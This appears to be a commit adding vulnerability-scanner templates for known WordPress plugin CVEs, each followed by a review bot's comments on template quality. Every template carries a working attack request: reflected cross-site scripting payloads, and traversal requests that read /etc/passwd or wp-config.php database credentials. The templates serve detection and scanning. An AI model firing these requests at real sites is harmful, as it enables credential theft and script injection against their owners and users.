Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
1 parent 8c092e9, commit 42d0338. Showing 52 changed files with 2,693 additions and 1 deletion.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
20241207 | ||
20241208 |
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,30 @@ | ||
id: CVE-2012-4242 | ||
|
||
info: | ||
name: WordPress Plugin MF Gig Calendar 0.9.2 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4242 | ||
|
||
description: "Cross-site scripting (XSS) vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page." | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
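Review bot: the request path hard-codes `page_id=2`, but the description places the injection on "the calendar page", which sits at whatever page ID the site assigned to it; on any install where the calendar is not page 2 this template reports nothing. Document that assumption in `description:` or make the page ID configurable. The `info` block also has no `tags:` line, unlike the other WordPress templates in this commit (for example `tags: cve,cve2014,wordpress,wp-plugin,lfi`), so tag-based selection will skip it.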
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,30 @@ | ||
id: CVE-2012-4273 | ||
|
||
info: | ||
name: 2 Click Socialmedia Buttons < 0.34 - Reflected Cross Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
description: Cross-site scripting (XSS) vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter. | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4273 | ||
|
||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
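Review bot: `info` has no `tags:` line and no `classification:` block, so this template cannot be picked up by the `wordpress` or `xss` tag filters that other templates in this commit carry, and it records no CWE or CVSS data. Add a `tags:` line following the pattern used elsewhere in the commit and a `cwe-id: CWE-79` entry; the two consecutive empty lines before `requests:` can also be reduced to one.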
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,25 @@ | ||
id: CVE-2014-4940 | ||
|
||
info: | ||
name: WordPress Plugin Tera Charts - Directory Traversal | ||
author: daffainfo | ||
severity: high | ||
description: Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php. | ||
reference: https://www.cvedetails.com/cve/CVE-2014-4940 | ||
tags: cve,cve2014,wordpress,wp-plugin,lfi | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd" | ||
|
||
matchers-condition: and | ||
matchers: | ||
|
||
- type: regex | ||
regex: | ||
- "root:.*:0:0" | ||
|
||
- type: status | ||
status: | ||
- 200 |
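Review bot: only `charts/zoomabletreemap.php` is requested, while the description names two affected endpoints, `charts/treemap.php` and `charts/zoomabletreemap.php`; a site where only the first is reachable is missed. Add the `treemap.php` path as a second entry under `path:`. The regex matcher also has no `part: body` and uses `root:.*:0:0` without the trailing colon that the CVE-2015-1000012 template in this commit uses (`root:.*:0:0:`); aligning the two keeps the /etc/passwd check consistent.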
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,35 @@ | ||
id: CVE-2015-1000012 | ||
info: | ||
name: WordPress MyPixs <=0.3 - Local File Inclusion | ||
author: daffainfo | ||
severity: high | ||
description: WordPress MyPixs 0.3 and prior contains a local file inclusion vulnerability. | ||
reference: | ||
- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 | ||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012 | ||
- http://www.vapidlabs.com/advisory.php?v=154 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2015-1000012 | ||
- http://web.archive.org/web/20210518144916/https://www.securityfocus.com/bid/94495 | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | ||
cvss-score: 7.5 | ||
cve-id: CVE-2015-1000012 | ||
cwe-id: CWE-200 | ||
metadata: | ||
google-query: inurl:"/wp-content/plugins/mypixs" | ||
tags: cve,cve2015,wordpress,wp-plugin,lfi | ||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd" | ||
matchers-condition: and | ||
matchers: | ||
- type: regex | ||
regex: | ||
- "root:.*:0:0:" | ||
part: body | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
# Enhanced by mp on 2022/06/06 |
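Review bot: `description:` says only that MyPixs "contains a local file inclusion vulnerability" and never names the entry point, although the request shows it is the `url` parameter of `mypixs/downloadpage.php`. State the file and parameter in the description so someone triaging a finding knows where to look. `cwe-id: CWE-200` is also a generic information-exposure class for a template named and tagged as LFI; if that value is deliberately carried over from an upstream record, a short comment saying so would help.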
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,35 @@ | ||
id: CVE-2016-1000127 | ||
|
||
info: | ||
name: AJAX Random Post <= 2.00 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
description: Reflected XSS in wordpress plugin ajax-random-post v2.00 | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000127 | ||
tags: cve,cve2016,wordpress,xss,wp-plugin | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.10 | ||
cve-id: CVE-2016-1000127 | ||
cwe-id: CWE-79 | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
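Review bot: `description:` is a single terse line that names neither the vulnerable file nor the parameter, both of which appear in the request (`js.php`, `interval`). Expand it along the lines of the CVE-2012-4273 template's description in this commit. Minor: `cvss-score: 6.10` is written as `6.1` in the CVE-2016-1000153 template, which has the same vector; pick one form.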
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,39 @@ | ||
id: CVE-2016-1000153 | ||
|
||
info: | ||
name: Tidio Gallery <= 1.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
description: Reflected XSS in wordpress plugin tidio-gallery v1.1 | ||
reference: | ||
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000153 | ||
- http://www.vapidlabs.com/wp/wp_advisory.php?v=427 | ||
- https://wordpress.org/plugins/tidio-gallery | ||
- http://www.securityfocus.com/bid/93543 | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.1 | ||
cve-id: CVE-2016-1000153 | ||
cwe-id: CWE-79 | ||
tags: cve,cve2016,wordpress,xss,wp-plugin | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
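Review bot: the payload sent in `galleryId` begins with `%22%3E` (`">`), but the body matcher looks only for `</script><script>alert(document.domain)</script>`, so it never verifies that the leading quote and bracket come back unencoded, which is the breakout the payload relies on. Match on the full decoded value, `"></script><script>alert(document.domain)</script>`, instead.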
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,28 @@ | ||
id: CVE-2019-14205 | ||
info: | ||
name: WordPress Ext Adaptive Images LFI | ||
author: pikpikcu | ||
severity: high | ||
tags: cve,cve2019,wordpress,wp-plugin,lfi | ||
description: A Local File Inclusion vulnerability in the Nevma Adaptive Images plugin before 0.6.67 for WordPress allows remote attackers to retrieve arbitrary files via the $REQUEST['adaptive-images-settings']['source_file'] parameter in adaptive-images-script.php. | ||
reference: https://github.com/security-kma/EXPLOITING-CVE-2019-14205 | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | ||
cvss-score: 7.50 | ||
cve-id: CVE-2019-14205 | ||
cwe-id: CWE-22 | ||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php' | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "DB_NAME" | ||
- "DB_PASSWORD" | ||
part: body | ||
condition: and | ||
- type: status | ||
status: | ||
- 200 |
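Review bot: the description writes the parameter as `$REQUEST['adaptive-images-settings']['source_file']`; the PHP superglobal is `$_REQUEST`, so the underscore appears to have been lost and should be restored. The `name:` also omits the affected range that the description gives ("before 0.6.67"), which most other templates in this commit include in their names.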
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,32 @@ | ||
id: CVE-2021-24176 | ||
|
||
info: | ||
name: WordPress JH 404 Logger XSS | ||
author: Ganofins | ||
severity: medium | ||
description: JH 404 Logger WordPress plugin through 1.1 doesn't sanitise the referer and path of 404 pages, when they are output in the dashboard, which leads to executing arbitrary JavaScript code in the WordPress dashboard. | ||
reference: | ||
- https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585 | ||
- https://wordpress.org/plugins/jh-404-logger/ | ||
tags: cve,cve2021,wordpress,wp-plugin,xss | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 5.40 | ||
cve-id: CVE-2021-24176 | ||
cwe-id: CWE-79 | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/jh-404-logger/readme.txt" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "JH 404 Logger" | ||
part: body | ||
|
||
- type: status | ||
status: | ||
- 200 |
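Review bot: the only request fetches `readme.txt` and the only body matcher is the plugin's name, so this reports a medium-severity CVE-2021-24176 finding for every site that has JH 404 Logger installed, without checking the version or the unsanitised referer and path output the description refers to. The description limits the issue to "through 1.1"; at minimum extract the version from the readme and compare it against that bound, or present the template as plugin detection rather than as the CVE.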
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,43 @@ | ||
id: CVE-2021-24342 | ||
|
||
info: | ||
name: JNews < 8.0.6 - Reflected Cross-Site Scripting (XSS) | ||
author: pikpikcu | ||
severity: medium | ||
description: JNews WordPress theme before 8.0.6 did not sanitise the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*), leading to a Reflected Cross-Site Scripting (XSS) issue. | ||
reference: | ||
- https://wpscan.com/vulnerability/415ca763-fe65-48cb-acd3-b375a400217e | ||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24342 | ||
|
||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.10 | ||
cve-id: CVE-2021-24342 | ||
cwe-id: CWE-79 | ||
|
||
requests: | ||
- raw: | ||
- | | ||
POST /?ajax-request=jnews HTTP/1.1 | ||
Host: {{Hostname}} | ||
Accept: */* | ||
Content-Type: application/x-www-form-urlencoded | ||
lang=en_US&cat_id=6"></script><script>alert(document.domain)</script>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67 | ||
matchers-condition: and | ||
matchers: | ||
|
||
- type: word | ||
words: | ||
- '</script><script>alert(document.domain)</script>' | ||
part: body | ||
|
||
- type: word | ||
words: | ||
- 'Content-Type: text/html' | ||
part: header | ||
|
||
- type: status | ||
status: | ||
- 200 |
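Review bot: in the raw request as shown there is no empty line between the `Content-Type: application/x-www-form-urlencoded` header and the `lang=en_US&cat_id=...` form data, and a raw HTTP request needs that separator for the line to be sent as the body rather than parsed as a header. Confirm the empty line is present in the file. The header matcher `Content-Type: text/html` is also written differently from the bare `text/html` used by the other XSS templates in this commit, the body matcher drops the `6">` prefix that the payload sends, and `info` has no `tags:` line.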
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,63 @@ | ||
id: CVE-2022-0422 | ||
|
||
info: | ||
name: WordPress White Label CMS <2.2.9 - Cross-Site Scripting | ||
author: random-robbie | ||
severity: medium | ||
description: | | ||
WordPress White Label CMS plugin before 2.2.9 contains a reflected cross-site scripting vulnerability. It does not sanitize and validate the wlcms[_login_custom_js] parameter before outputting it back in the response while previewing. | ||
impact: | | ||
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. | ||
remediation: | | ||
Update to WordPress White Label CMS plugin version 2.2.9 or later to mitigate this vulnerability. | ||
reference: | ||
- https://wpscan.com/vulnerability/429be4eb-8a6b-4531-9465-9ef0d35c12cc | ||
- https://plugins.trac.wordpress.org/changeset/2672615 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0422 | ||
- https://github.com/ARPSyndicate/cvemon | ||
- https://github.com/ARPSyndicate/kenzer-templates | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.1 | ||
cve-id: CVE-2022-0422 | ||
cwe-id: CWE-79 | ||
epss-score: 0.001 | ||
epss-percentile: 0.40139 | ||
cpe: cpe:2.3:a:videousermanuals:white_label_cms:*:*:*:*:*:wordpress:*:* | ||
metadata: | ||
max-request: 1 | ||
vendor: videousermanuals | ||
product: white_label_cms | ||
framework: wordpress | ||
tags: cve2022,cve,wordpress,xss,wp-plugin,wpscan,videousermanuals | ||
|
||
http: | ||
- raw: | ||
- | | ||
POST /wp-login.php?wlcms-action=preview HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
wlcms%5B_login_custom_js%5D=alert%28%2FXSS%2F%29%3B | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- "alert(/XSS/);" | ||
|
||
- type: word | ||
part: body | ||
words: | ||
- "wlcms-login-wrapper" | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 | ||
# digest: 490a0046304402202d864fa8ffa1dc0885d61b1e349c1c268e266c83d7d2e11e236e9df48039abe002205fb0b2d84d41d806cc6e52c0fdd1dbeed94827fa1019c490c3926ec16402eb79:922c64590222798bb761d5b6d8e72950 |
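Review bot: the reflected-value matcher looks for `alert(/XSS/);`, a string with no HTML metacharacters, so it matches equally when the server echoes the value as inert text and when it lands inside a script element; only the second case is the issue the description describes. Tighten it to a regex that requires the value inside a `<script>` block of the preview page. The two `part: body` word matchers can then be merged into one matcher with `condition: and`, as the CVE-2019-14205 template in this commit does, and the raw request as shown needs an empty line between the `Content-Type` header and the form body.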